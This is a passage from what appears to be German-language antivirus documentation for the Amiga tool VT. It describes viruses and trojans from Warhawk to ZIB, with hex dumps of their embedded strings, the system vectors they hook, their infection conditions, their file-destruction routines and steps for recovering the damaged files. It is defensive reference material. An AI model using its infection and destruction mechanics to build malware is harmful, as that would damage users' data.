trackdisk.device NICHT Namensbegruendung: im BB ist immer zu lesen 20574148 4E465249 45442053 5452494B WAHNFRIED STRIK 45532041 4741494E 20212120 20202020 ES AGAIN !! Vermehrung: ueber BB Allerdings ist ein vermehrter BB nicht mehr bootfaehig, da die BB-CheckSum nicht nachgebessert wird. Schaeden: Eine Zaehlzelle wird bei der Aktivierung des Viruses mit dem Wert $14 beschrieben. Sobald in der Zaehlzelle der Wert 0 erreicht wird, wird mit DisplayAlert ein Text ausge- geben. Dieser Text wird im Speicher decodiert mit: eori.b #$a7,d0 move.b d0,(a1)+ Text: Hardware Failure Press left mouse button to continue Guru Meditation #00000015.00C03L12 Hooligen-Bits randalieren im Datenbus! Gruß Erich! - Warhawk Cool, im Prg. DoIo, liegt immer ab $7e600 Fordert trackdisk.device nicht Clone: 04.03.92 Text entfernt Clone: RAF-Virus, LOVEMACHINE-Virus, MAAS s.o. Das Virusteil sichert den eigenen Speicherbereich NICHT. Es kann also ueberschrieben werden. Im BB ist zu lesen: 5741 52484157 4b205341 WARHAWK SA 5953203a 204b494c 4c494e47 20594f55 YS : KILLING YOU - Warshaw Avenger BeginIo, KickTag, KickChechSum, SumKickData grosse Aehnlichkeiten mit Lamer, BB aber unverschluesselt schreibt je nach Zaehlerstand BB oder schreibt in einen Diskblock (Lage je nach $dff006) $55 x Warsaw und 1 x !! . - WAWE-Trojan Ueberschreibt user.data Keine verbogenen Vektoren Wurde mit der HunkLab-Methode (s.o.) an MACK angehaengt. Im File ist zu lesen: 00000003 57415745 22390000 00984eae ....WAWE"9....N. ffdc224e 2c790000 00044eae fe62203c .."N,y....N..b < 00000000 4e754e75 00000000 75736572 ....NuNu....user 2e646174 6100646f 732e6c69 62726172 .data.dos.librar Das Wort "WAWE" ergibt sich zufaellig durch zwei Befehle. Zerstoerung: Es wird nach user.data gesucht und dieses File dann mit Speichermuell (Lage abhaengig von $DFF006) ueberschrieben. Das File ist NICHT zu erkennen und kann auch NICHT gerettet werden. VT bietet Ausbau an und es sollte ein lauffaehiges MACK- File uebrig bleiben. - WBPrefs-Virus File siehe oben bei 666!-Trojan - WECH-LVirus File Link und Zerstoerung Fileverlaengerung: 952 Bytes Verbogener Vektor: LoadSeg Zusaetzlich wird auch LastAlert veraendert Resetfest: Nein Link hinter den ersten Hunk. VT versucht Loadseg im Speicher zurueckzusetzen. VT versucht den Linkteil aus einem File auszubauen. Speicherverankerung: - LastAlert geaendert auf 00FFFFFF, 01FFFFFF, 02FFFFFF usw. - LoadSeg wird verbogen Zerstoerung (mit Absicht): Sobald LastAlert und $DFF006 einen bestimmten Wert haben, wird der Fileanfang ueberschrieben. picture.datatype-zerst: 00: 57454348 57454348 57454348 57454348 WECHWECHWECHWECH 10: 57454348 57454348 57454348 57454348 WECHWECHWECHWECH 20: 57454348 57454348 57454348 00040000 WECHWECHWECH.... Diese Files koennen NICHT gerettet werden. Vermehrungsbedingungen: - File ist noch nicht verseucht (Test mit SetComment) - Filename enthaelt nicht "-",".l" - File ausfuehrbar (3F3) - 3E9-Hunk wird gefunden - Einbauvarianten des Sprungs in das LinkTeil: - RTS am Hunkende soll zu NOP werden (im Test NIE gelungen) - RTS 0000 am Hunkende wird zu NOPNOP - RTS nicht genau am Hunkende wird zu Bra.s - 4EAEwxyz im Hunk wird zu 4EBA-Virus Das Teil meldet sich nicht. Hinweise: - Eine Syquest war nach 15 Minuten unbrauchbar. - Beim gewollten Linkvorgang entstanden Files OHNE Sprungbe- fehl. - Beim gewollten Linkvorgang entstanden Files mit defektem Linkteil. - Kein Test auf KS1.3 (LoadSeg) - Verwendet ungerade Adressen - Verwechselt wahrscheinlich $80(FIBlock) mit $7c(FIBlock) Vermutung insgesamt: Anfaenger ????? - WiREFACE-Varianten nach VT: Meist wird mit der 4EB9-Methode gearbeitet. Der Name WiREFACE wurde aus den decodierten Texten abgeleitet. Eine Ausnahme: in ComKiller ist zu lesen WIREFIRE - Typ A Trojanteil allein 2 Hunks 5852 Bytes neue Files ?? Bytes bekannter Filename: - MakeKey 9088 Bytes - Typ B Trojanteil allein 2 Hunks 5944 Bytes neue Files 99 Bytes bekannter Filename: - ScanLink 8040 Bytes - Typ C Trojanteil allein 2 Hunks 1880 Bytes neue Files 97 Bytes bekannte Filenamen: - VirusChecker V6.60 52400 Bytes - HDToolBox V40.9 106508 Bytes - LZX1.20Turbo 83660 Bytes - Typ D Trojanteil allein 2 Hunks 7108 Bytes neue Files 469 und 0 Bytes bekannter Filename: - AECrack 7924 Bytes - Typ E Trojanteil allein 2 Hunks 588 Bytes neue Files 64 und 0 Bytes bekannte Filenamen: - DarkroomIntro 32344 Bytes - SetBufVirus 1096 Bytes - Typ F zerstoert Rigid-Bereich bekannter Filename: - CheckMount 4672 Bytes - WiREFACE-Trojan File (format sys:) Typ A: Laenge: 9088 Bytes Filename: MakeKey (fuer Virus_Checker) VT bietet Loeschen an. Verwendet wurde die 4EB9-Methode. Der erste Link wurde gepackt. Im entpackten Link koennen Sie lesen: 57695245 46414345 202f2064 454d4f4e WiREFACE / dEMON 53206f46 20744845 2070454e 54414752 S oF tHE pENTAGR 414d202a 20574869 50504544 20594f55 AM * WHiPPED YOU 52204844 2c205355 4b4b4148 20212120 R HD, SUKKAH !! 5765204c 6f6f6b20 446f776e 20596f75 We Look Down You 72204e6f 73652028 4c617567 68746572 r Nose (Laughter 29210a00 7379733a 00007379 733a0000 )!..sys:..sys:.. 536e7570 70210000 7379733a 00007379 Snupp!..sys:..sy 733a7072 75707025 64007379 733a6261 s:prupp%d.sys:ba 6a732564 00007379 733a6b69 73732564 js%d..sys:kiss%d 00007379 733a706f 74746125 64007379 ..sys:potta%d.sy 733a0000 7379733a 0000536e 75707021 s:..sys:..Snupp! Ablauf: - sys: wird schnell formatiert mit dem Namen Snupp! - Danach sollen neue Files mit Zahlen (teilweise bis 1000) geoeffnet werden (also z.B. prupp46 usw.). Wenn Sie jetzt einen SystemRequester sehen, haben Sie "Glueck". Der Programmierer hat eine "Kleinigkeit" uebersehen. Ver- suchen Sie mit Disksalv eine Rettung. - Falls die Files angelegt werden (bei mir NICHT), duerfte die Partition verloren sein. Falls die Files angelegt wurden, erfolgt danach (hab "einfach" die Requester weggeklickt) - ein Schreiben nach Block 0 Inhalt $feeffeef Folge: NoDos 0000: feeffeef 00000000 00000000 00000000 ................ 0010: 00000000 00000000 00000000 00000000 ................ - und eine Endlos-Textausgabe ( WiREFACE...(Laughter)! ) im Cli . Es hilft nur ein Tastatur-Reset Typ B: Laenge: 8040 Bytes Filename: ScanLink (testet angeblich auf Linkviren) VT bietet Loeschen an. Verwendet wurde die 4EB9-Methode. Der erste Link wurde gepackt. Im entpackten Link koennen Sie lesen: 57695245 WiRE 46414345 202f2064 454d4f4e 53206f46 FACE / dEMONS oF 20744845 2070454e 54414752 414d202a tHE pENTAGRAM * 20574869 50504544 20594f55 52204844 WHiPPED YOUR HD 2c205355 4b4b4148 20212120 5765204c , SUKKAH !! We L 6f6f6b20 446f776e 20596f75 72204e6f ook Down Your No 73652028 4c617567 68746572 29210a00 se (Laughter)!.. 7379733a 00007379 733a0000 57695245 sys:..sys:..WiRE 46414345 00007379 733a0000 57695245 FACE..sys:..WiRE 46414345 3a707275 70702564 00005769 FACE:prupp%d..Wi 52454641 43453a62 616a7325 64005769 REFACE:bajs%d.Wi 52454641 43453a47 4f442753 2041524d REFACE:GOD'S ARM 59202d20 444f5020 2d202564 00005769 Y - DOP - %d..Wi 52454641 43453a70 6f747461 25640000 REFACE:potta%d.. 57695245 46414345 3a005769 52454641 WiREFACE:.WiREFA 43453a00 536e7570 70210000 6468313a CE:.Snupp!..dh1: 00006468 313a0000 506c7570 70210000 ..dh1:..Plupp!.. 6468303a 00006468 303a0000 466c7570 dh0:..dh0:..Flup 70210000 p!.. Bei Typ B sind also dh0: und dh1: dazugekommen. Leider wurde auch der Fehler nach der Format-Routine gefunden. Die Fuell- Files werden jetzt wirklich angelegt. Beispiel: prupp98 Laenge: 99 57695245 46414345 202f2064 454d4f4e WiREFACE / dEMON 53206f46 20744845 2070454e 54414752 S oF tHE pENTAGR 414d202a 20574869 50504544 20594f55 AM * WHiPPED YOU 52204844 2c205355 4b4b4148 20212120 R HD, SUKKAH !! 5765204c 6f6f6b20 446f776e 20596f75 We Look Down You 72204e6f 73652028 4c617567 68746572 r Nose (Laughter 29210a )!. Die Laenge der Fuellfiles aendert sich (z.B. bajs0 ueber 200000). Sie enthalten dann den Text (s.o.) und Speichermuell. Wenn Sie also nicht sehr schnell reagieren, ist auch mit Disk- salv nichts mehr zu retten. Das erste bearbeitete Laufwerk (sys:) heisst jetzt WiREFACE. Typ C: Anderer moeglicher Name: Alfons-Eberg-2.0-Trojan siehe in Dump Zerstoerung HD0: mit 68040 gelungen. Bekannte Filenamen: - VirusChecker V6.60 Laenge: 52400 Bytes - HDToolBox V40.9 Laenge: 106508 Bytes - LZX1.20Turbo Laenge: 83660 Bytes VT bietet nur Loeschen an, da die Programme in DER Versions- nummer im Juli 95 NICHT existieren. Verwendet wurde die 4EB9-Methode. Zusaetzlich wurde beim HDTOOL- Box-File noch ein 3E8-*Art-Hunk davorgelinkt. Betroffene Medien sollen jetzt sein: BBS, DH0, DH1, DH2, DH3, DH4, DH5, D0H0, SYS und NCOMM CP17 Laenge: 97 Bytes 414c464f 4e5320c5 42455247 20566952 ALFONS .BERG ViR 55532076 322e3020 df657461 20627920 US v2.0 .eta by 57695245 46414345 202f2064 454d4f4e WiREFACE / dEMON 53206f46 20744845 2070454e 54414752 S oF tHE pENTAGR 414d2c20 64656469 63617465 6420746f AM, dedicated to 2028436f 726e2946 6c616b65 2f545253 (Corn)Flake/TRS 49 I Die Laenge der Fuellfiles aendert sich (z.B. harharhar 100000). Sie enthalten dann den Text (s.o.) und Speichermuell. Wenn Sie also nicht sehr schnell reagieren, ist auch mit Disk- salv nichts mehr zu retten. Typ D: Filename: AECrack Laenge: 7924 Bytes Nach FileID: CRACK AMIEXPRESS PASSWORDS VT bietet nur Loeschen an. Am Anfang haengt ein 3E8-*ART-Hunk Nach dem Entpacken erkennt man, dass mit der 4EB9-Methode zwei GLEICHE wieder gepackte Teile zusammengelinkt wurden. Im entpackten Teil ist zu lesen: 00002d21 p.L.@.Nu%s%s..-! 2d576952 45464143 452d212d 00005359 -WiREFACE-!-..SY 533a0000 5359533a 2d212d57 69524546 S:..SYS:-!-WiREF 4143452d 212d0000 4448303a 00004448 ACE-!-..DH0:..DH 303a2d21 2d576952 45464143 45206445 0:-!-WiREFACE dE 4d4f4e2d 212d0000 4242533a 00004242 MON-!-..BBS:..BB 533a2d21 2d64454d 4f4e2057 69524546 S:-!-dEMON WiREF 4143452d 212d0000 4448313a 00004448 ACE-!-..DH1:..DH 313a2d21 2d576952 45464143 45207045 1:-!-WiREFACE pE 4e544147 52414d2d 212d0000 NTAGRAM-!-.. Ablauf: Die Format-Routine ist weggefallen. Betroffene Medien: SYS:, DH0:, BBS: und DH1: (s.o.) Es wird ein File (Laenge: 469, Name bei SYS: -!-WiREFACE-!-) angelegt. Inhalt: WiREFACE / dEMONS oF THE PENTAGRAM presents... (tadaa) 'KLiA MiG PÅ NUPPEN' TROjAN (SUPER BETA RELEASE(BETA BETA CODE)) usw. ALLE anderen Files des Laufwerks werden auf die Laenge 0 gesetzt. Am Schluss wird im cli in einer Endlosschleife der Text, der auch ins File geschrieben wird, ausgegeben. Typ E: Filename:DarkroomIntro Laenge: 32344 Bytes oder Filename: SetBufVirus Laenge: 1096 Bytes (gepackt aber nicht gelinkt ???) VT bietet nur loeschen an. Mit der 4EB9-Methode wurde ein Trojanteil und ein Intro von 1994 zusammengelinkt. Beide Teile sind gepackt: Im entpackten 1.Link ist zu lesen: 733a s: 00006465 76733a00 6c696273 3a006c3a ..devs:.libs:.l: 0000256c 7364454d 4f4e5320 6f462074 ..%lsdEMONS oF t 48452070 454e5441 4752414d 21002a2a HE pENTAGRAM!.** 2aae3043 6b276e27 ae304c4c 2054ae30 *.0Ck'n'.0LL T.0 6a414e2a 2a2a2062 79205769 52454641 jAN*** by WiREFA 4345202f 20644f50 21202d54 6f204845 CE / dOP! -To HE 4c4c2057 69746820 7961276c 6c210000 LL With ya'll!.. Ablauf: Betroffene Verzeichnisse: s, devs, libs, l In diese Verzeichnisse wird ein 64 Bytes langes File mit dem Namen dEMONS oF tHE pENTAGRAM! geschrieben. Textinhalt: ***... usw. s.o. Die restlichen Files in den Verzeichnissen werden auf die Laenge 0 gesetzt. Typ F: Filename:CheckMount Laenge: 4672 Bytes Laut Dok: Mount-972 Virus Checker Vor dem gepackten File sitzt ein 3E8-*Art-Hunk. Im entpackten File ist zu lesen: 00000000 73637369 2e646576 69636500 ....scsi.device. 69636464 69736b2e 64657669 6365006f icddisk.device.o 6b746167 6f6e2e64 65766963 6500536f ktagon.device.So 66745343 53495f4f 6b746167 6f6e4339 ftSCSI_OktagonC9 582e6465 76696365 00285472 6f6a616e X.device.(Trojan 4e616d65 3a20694c 534b4e41 20414e44 Name: iLSKNA AND 52454153 2076312e 31292057 69524546 REAS v1.1) WiREF 41434520 2f206445 4d4f4e53 206f4620 ACE / dEMONS oF 74484520 70454e54 41475241 4d207374 tHE pENTAGRAM st ;... 210a0000 6e756767 65744064 61746170 !...nugget@datap 686f6e65 2e73650a 0000436f 756c646e hone.se...Couldn Ablauf: Im cli wird immer wieder nugget@dataphone.se ausgegeben. Gleichzeitig wird nach bestimmmten devices (s.o.) gesucht. Schaden beim Test: Der Rigid-Bereich wurde mit Speichermuell vollgeschrieben. Danach stand der Rechner. Es waere keine schlechte Idee vom Rigid-Zylinder ein Backup zu haben (z.Zyl/backup). Mit z.Zyl/restore konnte die Festplatte ohne Verlust reaktiviert werden. Vorher musste selbst in der hdtoolbox der Festplattentyp festgelegt werden. Hinweis 09.09.96: Ein AntiVirusPrg. erkennt im Moment in dem File mit dem Namen INTRO.EXE (L:74036) ein Wireface-Teil. Es handelt sich hierbei um eine FEHLERKENNUNG !!!! Fehler wurde im Fruehjahr 1998 erkannt und von dem neuen Programmierer des Antivirusprogramms behoben. - WIREFIRE-Trojan gegen BBS Filename: Comkiller1.6 Laenge: 4604 Bytes Nach FileID: Command Virus Killer/Scanner V1.6 In Wirklichkeit sind mit der 4EB9-Methode zwei Teile zusammenge- linkt. VT bietet nur Loeschen an, da ich ein Version 1.6 nicht kenne. Im entpackten 1. Link ist zu lesen: 68696869 68690057 49524546 49524500 hihihi.WIREFIRE. 6262733a 00626273 00626273 00ff0053 bbs:.bbs.bbs...S ;.... 3a746573 742e6461 74610062 62733a6e :test.data.bbs:n 6f646534 2f706c61 7970656e 2f707374 ode4/playpen/pst 2d666f72 2e747874 00626273 3a6e6f64 -for.txt.bbs:nod ;usw. Soll user.data auslesen und ablegen. Fuer User ohne Mailbox kaum Gefahr. - X-Fucker-Virus File Link- UND Zerstoerungsroutine Verbogene Vektoren: Open und LoadSeg Nicht Resetfest Duerfte mit KS1.3 Probleme haben. Verlaengert ein File um 828 Bytes. Zu Beginn eines verseuchten Files ist zu lesen: 0000: 000003f3 00000000 00000001 00000000 ................ 0010: 00000000 00000411 000003f1 00000003 ................ 0020: 2f582046 75636b65 72000000 000003e9 /X Fucker....... Also ein 3F1-Hunk !!!!!!!!!!!! Schreibt Z nach $0, um zu erkennen, dass das Teil schon im Speicher ist. Schaeden: Bei Open: Test auf Systemzeit mind. 21.Feb.95 Falls nein: Original-Open Test auf BBS: im Pfad (also nur gegen BBS) Falls nein: Original-Open Es wird Mode NewFile gesetzt. Dies soll das Loeschen des Files im BBS-Bereich bewirken. Bei LoadSeg: KEIN Test auf BBS (also kann jeder betroffen sein) Test auf File hat nur 1 Hunk Falls nein: Original-LoadSeg Test auf 3F1-Hunk Falls ja: Original-LoadSeg Damit soll ein Mehrfachbefall vermieden werden. Ablauf: Es wird vorne ein 3F1-Hunk angehaengt. Laenge 20 Bytes Danach wird zu Beginn des ersten Hunks das eigentliche Virus- teil geschrieben. Laenge 808 Bytes Dann wird nach $3EC (reloc) gesucht. Falls nein: Ende der Ver- seuchung. Falls ja: Veraenderung von Reloc und im File. Ein echtes Abenteuer (Programmierer mit WENIG Ahnung). Bei Tests hat sich gezeigt, dass sehr viele Files defekt sind. z.B. $3F2 am Ende fehlt, falscher Umgang mit Chip-Hunk usw. Bei solchen Files verweigert VT den Ausbau und bietet nur Loeschen an. Bei "guten" Files versucht VT den Ausbau. VT sollte das Virusteil auch im Speicher erkennen. - XaCa-D.Killer Disk-Killer Clone s.o. Laenge PP-gepackt: 1440 Bytes Laenge ungepackt : 1368 Bytes Filename: disktest Jemand hat es wieder einmal geschafft, einen Text zu aendern. Tut mir leid, die Muehe war umsonst. Im entpackten File ist zu lesen: 20205861 4361206c 756d6d69 6e205631 XaCa lummin V1 2e352020 200a2020 20202020 20202020 .5 . 20202020 20202020 20202020 20202020 20202020 20200a43 41544348 204d4520 .CATCH ME 49462059 4f552043 414e2120 47524820 IF YOU CAN! GRH usw. - xcom-Insta. File Installer Filename: version.library Laenge: #900 Bytes Im File ist zu lesen: 7273696f 6e2e6c69 62726172 79007665 rsion.library.ve 7273696f 6e203430 2e343320 2832332e rsion 40.43 (23. 342e3934 290d0a00 0000002a 00000058 4.94)......*...X Diese Versionsnummer kenne ich nicht. Meine Original-version- .library ist nur #272 Bytes lang. VT bietet Loeschen an. Kopieren Sie danach von Ihrer Original-WB-Disk die version.library wieder auf. Das xcom-Teil ist hier codiert eingebaut, vermehrt sich dann aber uncodiert (siehe unten). - xcom-LVirus File Link vgl. auch HappyNewYear96 ab KS2.04: ja (Versionsabfrage auf mind. #37) Namensbegruendung: im Linkteil ist uncodiert zu lesen: f00ab240 6d047001 4e757000 4e757863 ...@m.p.Nup.Nuxc 6f6d48e7 omH. ^^ ;..... ^^ 0029646f 732e6c69 62726172 7900abcd .)dos.library... ^^^^^^^^ Verbogener Vektor: LoadSeg Resetfest: Nein Fileverlaengerung: 576 Bytes Link hinter den ersten Hunk. Test ob LoadSeg schon verbogen Aktivierung in Abhaengigkeit von $DFF006 und $DFF00A (neu) VT versucht Loadseg im Speicher zurueckzusetzen. VT versucht den Linkteil aus einem File auszubauen. Vermehrungsbedingungen: - File ist noch nicht verseucht (1 LW-Test) - Filename enthaelt nicht ".l" oder "-" - max. Filelaenge #124000 Bytes - min. Filelaenge #2400 Bytes - 3E9-Hunk wird gefunden - Disk validated - mind. 4 Block frei - RTS wird gefunden ( max. loop $3F ) - RTS wird ersetzt durch bra.s oder NOP Ueberspringt 3E8,3F0,3F1-Hunks usw. !!!!! Das Teil meldet sich nicht. Hinweis: Falls Ihre HD sehr verseucht ist, dann beginnen Sie bitte mit dem C-Verz. (File-Speicher-File). Das haeufige Neueinlesen wird dadurch geringer. - XCOPY2-BB eigentlich ein Anti-BB sehen Sie deshalb unten Dort gehoert er eigentlich auch nicht hin, da er nicht nach Viren sucht, aber ich wollte den BB in diesem Dokument behal- ten und nicht nach "andere BB" auslagern - XCopyPro6.5-Trojan Erzeugt beim Starten von XCopyPro V6.5 (Laenge:28336) den BB Little Sven Hinweis: im April 92 lag die OrigVersionsNr. von Xcopy erst bei 5.2x (glaub ich). Gefunden in: xcopy65e.lha Laenge: 25360 VT bietet Ausbau an. - XENO Link-Virus, verlaengert das befallene Prg. um 1124 Bytes verbiegt DosOpen, DosLock und DosLoadSeg erhoeht Hunk-Zahl im File-Header nicht !!! testet vor Befall Filenamen auf 0-9, a-z und A-Z, Folge: Programme, deren Namen SonderZeichen enthalten, werden n i c h t befallen. Ausserdem werden a l l e Prg., die im Unterverzeichnis l oder devs stehen, n i c h t verseucht. Textausgabe (Output, Write) in Abhaengigkeit von $DFF006 Text wird erst zur Ausgabe decodiert ( eori.b #-$80,(a0)+ ) : Greetings Amiga user from the Xeno virus! in einem verseuchten File ist in der Naehe von $460 mit einem Monitor zu sehen: l.devs.fastfilesystem. - XENO a kleine Veraenderung um AntiVirusPrg.e zu taeuschen 09.03.92 Nachtrag 02.11.92: mehrere Xeno-links ans gleiche File sollten in einem Durchgang ausgebaut werden. - XENO-nichtlauff File Kleine Veraenderung um AntiVirusPrg.e zu taeuschen. Aber der Zusammenhang zwischen Hunkanzahl und notwendigen Hunk- laengenangaben scheint nicht klar zu sein (Anfaenger). Das File ist NIE lauffaehig. Amiga-Dos meldet: Error code 121 Bad loadfile hunk VT bietet loeschen an. - Xerox = DIGITAL AGE = Forpib-Clone nur Text geaendert - XLINK V3.0 File VT glaubt ein File gefunden zu haben, das mit XLINK erzeugt wurde. Es handelt sich angeblich um ein Szenen-Programm, mit dem 2 ausfuehrbare Programm-Files zu 1 File zusammengelinkt werden koennen. Also geeignet fuer VirenProduktion !!! Muss aber NICHT immer negativ verwendet werden. VT sucht in dem File NICHT nach Viren-Mustern. Sie muessen selbst eine Entscheidung treffen. HINWEIS ab VT2.54 : Sie koennen jetzt im File-Requester Teil 1 oder 2 abschalten. Link1aus - schaltet den Programmteil 1 ab. Link2aus - schaltet den Programmteil 2 ab. Dies kann natuerlich nur ein NOTNAGEL sein. Besser ist es, wenn Sie mir das verseuchte Teil zuschicken und noch mehr erleichtern Sie mir meine Arbeit, falls Sie zufaellig das Programm auch im ungelinkten Zustand besitzen. Bitte fertigen Sie sich von dem gelinkten Programm zwei ver- schiedene Namenskopien auf einer sonst leeren Disk an. Schalten Sie danach an Kopie 1 den Link 1 ab und an Kopie 2 den Link 2 ab. Wenn Sie Glueck haben, ist ein lauffaehiges Programm dann ohne Virusteil oder ohne Intro !! Aber !!! Es ist auch moeglich, dass das Haupt-Programm NICHT mehr laeuft. Warum ? Beispiel: Eine Gruppe hat ein Intro vor ein Spiel gelinkt. Dann koennen in diesem Intro schon Veraenderungen am Computer (FastRam ab- schalten usw.) vorgenommen werden, die das Spiel voraussetzt. Ohne das Intro ist das Spiel dann logischerweise nicht lauf- faehig. MERKE: Ein so veraendertes File gibt man NICHT weiter!!! - XPRZSPEED-Virus anderer Name: ZSPEED-Virus s.u. - Xtruder3.5-Trojan Zerstoerung Filelaenge: 183700 Bytes Notwendig: Xtruder.key (als Faelschung) (sonst nur bei "sehr unguenstigen" Bedingungen) Nicht Resetfest Verbogener Vektor: Keine Zerstoerung: Veraendert Filelaengen auf SYS: Empfehlung: Sofort Loeschen Im File ist zu lesen: 4e004c3a 58747275 6465722e 6b657900 N.L:Xtruder.key. 58747275 6465722e 6b657900 23352041 Xtruder.key.#5 A 6c657820 486f6c73 7400533a 00005359 lex Holst.S:..SY 533a5072 6566732f 456e762d 61726368 S:Prefs/Env-arch 69766500 433a0000 5359533a 00006100 ive.C:..SYS:..a. Test: Ich stelle fest, dass ich WEDER ein Original-key.file NOCH ein FALSCHES key.file besitze. Es geht auch auf einem anderen Weg. Nach Xtruder3.5-Aufruf: Pfad SDH0: VTFlush2 0 FileL 0? ;..... l/Bootblock.brainfile 0 FileL 0? ;..... c/AddBuffers 0 FileL 0? ;..... libs/xtruder.library 0 FileL 0? ;..... devs/system-configuration 0 FileL 0? ;..... Es wurden also alle Filelaengen (auch in SubDirs) auf 0 gesetzt. Stellungnahme des Programmierers im Netz: *** area : VIRUS_AMY Date: 30 Jun 97 20:40:01 *** from : Martin Wulffeld (39:141/124.53) *** to : All *** about: Xtruder 3.5 Hi As some of you may know Xtruder 3.5 has done a bit of damage to peoples files. However, it has only affected those people who used a fake keyfile and hopefully also the criminal B---- P------- (2:---/--) who still owes my friend Alex Holst somewhere around 7000 Dkr. I hope all you fucknuts learned a lesson. From v3.6 and forward I will remove this behaviour. Peace out! . martin . kozmiq . wulffeld@post4.tele.dk . see ya at roskilde'98 Meine Anmerkung: Ich halte die Vorgehensweise fuer verantwortungslos und rechtlich SEHR bedenklich. Ich denke, der Programmierer hat sich und seinem Programm einen sehr grossen Baerendienst erwiesen. Das Vertrauen der User duerfte dahin sein. Nachtrag 97-07-09: Auszug aus Xtruder V3.6: 4e004c3a 58747275 6465722e 6b657900 N.L:Xtruder.key. 58747275 6465722e 6b657900 610001ac Xtruder.key.a... Es hat im AmyNet-Vir (nicht aminet) mehrere Rechtfertigungs- versuche des Programmierers gegeben. Anscheinend hat er seine Meinung geaendert und den Zerstoerungsteil aus V3.6 wieder entfernt. Ob er dadurch das Vertrauen zu sich und seinem Programm zurueckgewinnt, mag jeder User fuer sich selbst entscheiden. Es gibt ein Sprichwort: Wer einmal .... Nachtrag 97-07-27: Es tauchen in letzter Zeit immer wieder Meldungen in Amiga-Netzen auf, die falsche Xtruder-Versions-Nummern (z.B. 3.6) enthalten und auf Viruseigenschaften hinweisen. Diese Aussagen sind FALSCH !!!!! Es handelt sich NICHT um ein Virus-Teil, sondern um ein Trojan-Teil, da KEINE Vermehrung stattfindet. Die Zerstoerungs- routine wurde NUR (!!!!) in V3.5 gefunden. In V3.4, V3.6 habe ich diese Routine NICHT gefunden !!!!! - YAMmsg.2-Trojan Zerstoerung bekannter Filename: YAM.msg.2 Namensbegruendung: Filename uebernommen Filelaenge: #216296 Bytes Nicht Resetfest Keine verbogenen Vektoren Ablauf: Das Programm beendet sich bei mir mit einem Requester "Illegal Instruction" In Wirklichkeit wurde ein neues loadwb-File geschrieben. Name: lOAdwB Laenge: 40544 Im File ist zu lesen: 45523a20 6c6f6164 77622033 392e3920 ER: loadwb 39.9 2833302e 30332e39 3529266d 80102f0b (30.03.95)&m../. Dieses File enthaelt wieder zwei Files zum Schreiben UND ausfuehren: - Orig-Loadwb Laenge: 1136 Bytes - Format Laenge gepackt: 9312 Bytes Laenge entpackt: 13368 Bytes VT bietet nur loeschen an. - Z.E.S.T BB LADS-Clone s.o Aenderung: lesbarer Text, kein TaeuschAlert, verschluesselter Text ist gleich (Anfaenger) lesbarer Text: Z.E.S.T is the B.E.S.T Virus-Killer usw. - ZACCESS V1.0 16Bit-Clone s.o. nur Text geaendert - ZACCESS V2.0 Forpib-Clone s.o. nur Text geaendert - ZACCESS V3.0 Extreme-Clone s.o. nur Text geaendert - ZAPA_B.Door Filename DM-Trash Laenge gepackt: 4764 VT erkennt P-Packer Laenge entpackt: 7636 VT erkennt ZAPA gegen AmiExpress ??? dm-tr.lha 5135 Bytes entpackt: dm-trash 4764 Bytes folgender Text (doc) ist zur Taeuschung enthalten: New virus ...caused by the new FIXED (?) Version of DMS 1.11 Turbo! It is some kind of linkvirus and uses Devices like DH0:, LIBS:, and BBS: (!!) usw. Eigene Versuche mit FangFiles (habe AmiExpress nicht) haben ergeben, dass eben von dm-trash folgende Files veraendert wer- den: bbs:config1 bbs:user.data bbs:user.key Die Files wurden verlaengert und ZAPA eingetragen. dm-trash. Vermutlich soll ein Superlevel fuer einen Boxzu- gang geschaffen werden. Also fuer normale Amiga-User kein Problem. VT bietet loeschen an. - ZENKER-Virus BB KS2.04: ja im Speicher immer ab $7F800 Cool $7F86c DoIo $7F894 Fordert trackdisk.device NICHT Versucht im BB durch lesbaren Text zu taeuschen: Commodore Bootloader (20 Oct 1987) Dieser BB holt in Wirklichkeit ab $70000 auf Speichermedium (bei Disk Zyl 40 Sektor 16-19) 4 Bloecke. Die ersten beiden Bloecke enthalten das Virusteil. Die restlichen beiden Bloecke enthalten den ehemaligen Original-BB. Dabei wurde ab der DOS-Kennung == ZENKER == eingetragen. Dies behindert die Vermehrung nicht, da das Virusteil erst ab $C in den Original-BB einspringt. Das Virusteil meldet sich NICHT. Vermehrung und Schaeden: Der Original-BB der eingelegten Disk wird nach $7FC00 geholt, == Zenker == eingetragen und dann mit dem Virus-Teil nach Zyl 40 Sektor 16 ff. abgespeichert. File-Bloecke an dieser Stelle oder die BitMap (im Test passiert) werden ueberschrieben und koennen NICHT gerettet werden !! Tut mir leid. Danach wird der Bootloader in den BB geschrieben. Falls der BB-loader erkannt wurde, sollte das Gadget O-BB aktiviert werden. Sie koennen damit versuchen, den Original-BB von Zyl 40 zu holen. VT schreibt dann die Dos0-Kennung und $370 neu. Danach wird die BB-CheckSum neu berechnet. Diesen BB koennen sie dann mit Speicher-BB zurueckschreiben oder im File-Req abspeichern. Vielleicht haben Sie Glueck und ihre Disk bootet wieder. Der Fehler auf Zyl 40 kann aber NICHT behoben werden. Auf Festplatte arbeiten Sie bitte so NICHT. Holen Sie das Backup des Rigid-Bereichs hervor (das haben Sie doch oder ???) und schreiben Sie den Rigid-Bereich mit ihrer Kontroller-Software (ist mir lieber so) oder wenn es gar nicht anders geht mit VT- Restore zurueck. Erkennung und Loeschung mit VT2.51 getestet: Speicher 19.03.93 BB 19.03.93 BlockITest 19.03.93 BlockKette 19.03.93 hole O-BB 21.03.93 Hinweis 25.10.93: Das VirusTeil verseucht auch FFS-Disketten. Da aber immer ein DOS0-BB geschrieben wird (ist ausgetestet), wird beim naechsten Schreibzugriff (z.B. copy File) die Disk- Struktur noch weiter zerstoert. - ZIB-Inst. Installer ab KS2.04: ja Verbogener Vektor: LoadSeg Resetfest: Nein Filename: z.B. loadwb Virusteillaenge: #1264 Bytes (also 4 Bytes mehr als ZIB-Virus) Link hinter den ersten Hunk. Speicherverankerung und Vermehrungsbedingungen: - siehe bei ZIB-Virus - es wird an die Files dann das ZIB-Virus (1260) gelinkt. Sprung aus loadwb in das Linkteil (auch mehrfach): - move 4.w,a6 (4 Bytes) wird zu bsr.w Linkteilstart (6100wxyz) - move.l 4,a6 (6 Bytes) wird zu bsr.w Linkteilstart + 1 NOP - Looptiefe $7FFF - RTS wird zu bra.s Linkteilstart+4 (60yz) - Looptiefe $7B + 4 (also anderer Vorgang als ZIB-Virus) VT versucht das Linkteil aus loadwb auszubauen. - ZIB-Inst.-Inst. Installer fuer loadwb Filename: z.B. spatch Virusteillaenge: #2080 Bytes Link hinter den ersten Hunk. Decodiert (mit $85 und $BEEF) ist im 